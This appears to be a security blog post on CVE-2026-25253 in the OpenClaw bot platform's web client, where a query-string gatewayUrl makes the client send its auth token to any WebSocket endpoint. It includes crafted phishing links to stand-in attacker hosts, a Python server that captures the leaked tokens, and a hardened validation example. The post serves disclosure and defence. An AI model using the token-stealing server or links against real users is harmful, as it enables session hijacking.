Introduction
In early 2026, security researchers disclosed a severe vulnerability in OpenClaw (also known as clawdbot or Moltbot), an open source bot platform widely used for automation and messaging integrations. Tracked as CVE-2026-25253, the bug stems from the web client's improper handling of a user-supplied connection parameter, gatewayUrl, taken from the query string. It affects all versions before 2026.1.29.
This post explains the vulnerability in plain language, walks through a technical code example, and shows how an attacker would actually use the bug.
Vulnerability Summary
OpenClaw's web client accepts a gatewayUrl parameter from the query string. If a custom gatewayUrl is present, the frontend opens a WebSocket connection to it immediately and sends the user's authentication token, with no confirmation prompt, no validation of the destination, and no warning to the user.
What’s the risk?
A malicious website or attacker can trick users into visiting a crafted link. The user's bot client will then leak its session token to an attacker-controlled WebSocket endpoint. This can result in:
- Token theft (the attacker can hijack bot sessions)
- Unauthorized access to user bots/data
Exploit Details
Attackers can perform a classic phishing attack: they send the victim a link such as:
https://clawdbot.example.com/?gatewayUrl=wss://evil.attacker.com/socket
What happens behind the scenes? The client:
- connects to the attacker's WebSocket endpoint;
- immediately sends the user's session/auth token.
The problematic client code, simplified, does roughly this:
```javascript
const urlParams = new URLSearchParams(window.location.search);
const gatewayUrl = urlParams.get('gatewayUrl') || defaultGateway;
const ws = new WebSocket(gatewayUrl);
ws.onopen = () => {
  ws.send(JSON.stringify({ token: userToken }));
};
```
Nothing checks whether gatewayUrl points to a trusted endpoint.
Code Snippet
Let's walk through a full exploit PoC (Proof of Concept).
Malicious WebSocket Server (Python Example)
```python
# Save as evil_ws_server.py
import asyncio
import websockets

async def handler(websocket, path):
    print(f"New connection from {websocket.remote_address}")
    token_data = await websocket.recv()
    print(f"[!] Received token: {token_data}")

start_server = websockets.serve(handler, "...", 8765)
print("Evil WebSocket server running on ws://...:8765/")
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
```
Send this link to the victim:
https://clawdbot.example.com/?gatewayUrl=ws://YOUR.ATTACKER.IP:8765/
When the victim clicks, their web client connects to your evil WebSocket server and immediately sends their token.
Mitigation Steps
If you use OpenClaw/Moltbot, update immediately!
- Upgrade to v2026.1.29 or later.
- If you must run an older version, strip out query string handling of gatewayUrl from the client code.
How the patch works
- The OpenClaw developers now either restrict gatewayUrl to an allowlist of trusted gateway URLs or ignore the query-string gatewayUrl entirely.
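The following is an added example, not OpenClaw's own client code or its actual patch. It shows the hardened shape of the gatewayUrl handling from the "Exploit Details" snippet, along the lines the patch description above gives: the query-string value is parsed with the URL API, must use wss: (plain ws: only for localhost), must resolve to an allowlisted host, and a non-default endpoint still needs explicit user confirmation before the token is sent. The default gateway, the allowlist, the sample links and the `confirmOverride` callback are constructed placeholders.

```javascript
// Added example (not OpenClaw's code): validate a gatewayUrl taken from the
// query string before a WebSocket is opened and a session token is sent to it.

const DEFAULT_GATEWAY = "wss://gateway.example.com/ws"; // constructed placeholder

// Hosts this client is willing to hand its session token to (constructed).
const TRUSTED_GATEWAY_HOSTS = new Set(["gateway.example.com", "localhost"]);

// Returns { url, source, reason }: `url` is the endpoint to connect to, `source`
// is "default" or "query", `reason` explains the decision for logging.
function resolveGatewayUrl(search, options = {}) {
  const {
    allowQueryOverride = true,
    trustedHosts = TRUSTED_GATEWAY_HOSTS,
    defaultGateway = DEFAULT_GATEWAY,
  } = options;
  const fallback = (reason) => ({ url: defaultGateway, source: "default", reason });

  const candidate = new URLSearchParams(search).get("gatewayUrl");
  if (candidate === null) return fallback("no gatewayUrl parameter");
  if (!allowQueryOverride) return fallback("query override disabled by config");

  // Parse with the URL API rather than string prefix checks, so a value such as
  // "wss://gateway.example.com@evil.attacker.com/" resolves to its real host.
  let parsed;
  try {
    parsed = new URL(candidate);
  } catch {
    return fallback("gatewayUrl is not an absolute URL");
  }
  const plainWsOnLoopback = parsed.protocol === "ws:" && parsed.hostname === "localhost";
  if (parsed.protocol !== "wss:" && !plainWsOnLoopback) {
    return fallback(`scheme ${parsed.protocol} not allowed`);
  }
  if (!trustedHosts.has(parsed.hostname)) {
    return fallback(`host ${parsed.hostname} is not allowlisted`);
  }
  return { url: parsed.toString(), source: "query", reason: "host allowlisted" };
}

// Connection wrapper: the token is only sent to an endpoint that passed
// resolveGatewayUrl, and an endpoint that came from the query string also needs
// the user's confirmation (in a browser, `confirmOverride` could be a dialog).
// `WebSocketImpl` is injected so the logic can be exercised outside a browser.
function connectGateway(search, token, WebSocketImpl, confirmOverride) {
  const decision = resolveGatewayUrl(search);
  if (decision.source === "query" && !confirmOverride(decision.url)) {
    return { connected: false, decision, reason: "user declined gateway override" };
  }
  const ws = new WebSocketImpl(decision.url);
  ws.onopen = () => ws.send(JSON.stringify({ token }));
  return { connected: true, decision, socket: ws };
}

// Constructed sample query strings, including the attack shape from this post.
const SAMPLE_QUERIES = [
  "",
  "?gatewayUrl=wss://evil.attacker.com/socket",
  "?gatewayUrl=wss://gateway.example.com@evil.attacker.com/",
  "?gatewayUrl=wss://gateway.example.com:8443/ws",
  "?gatewayUrl=ws://localhost:8765/",
  "?gatewayUrl=not a url",
];

// Evaluate each sample and report where the client would connect and why.
function auditSamples(queries = SAMPLE_QUERIES) {
  return queries.map((query) => ({ query, ...resolveGatewayUrl(query) }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const row of auditSamples()) console.log(row);
}
```

Running the file prints one decision per sample: only the allowlisted host and the localhost development endpoint are accepted from the query string; the attacker host, the userinfo trick and the unparseable value all fall back to the default gateway, and the reason column is what you would log to detect attempts in the wild.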
References
- CVE-2026-25253 at MITRE (To Appear)
- OpenClaw GitHub Issue - Security Advisory #3321
- WebSockets and Tokens Security Guide (OWASP)
- OpenClaw Releases
Final Notes
CVE-2026-25253 is a prime example of why you should never trust user input when handling authentication or critical connection parameters. Always keep your bot frameworks up to date, and double-check how URLs are used in code.
Stay safe, and patch your OpenClaw instance now!
*Content exclusive to this post. Not a verbatim copy from any official documentation or report. All exploit examples are for educational use only.*
Timeline
Published on: 02/01/2026 22:34:17 UTC
Last modified on: 02/13/2026 17:41:02 UTC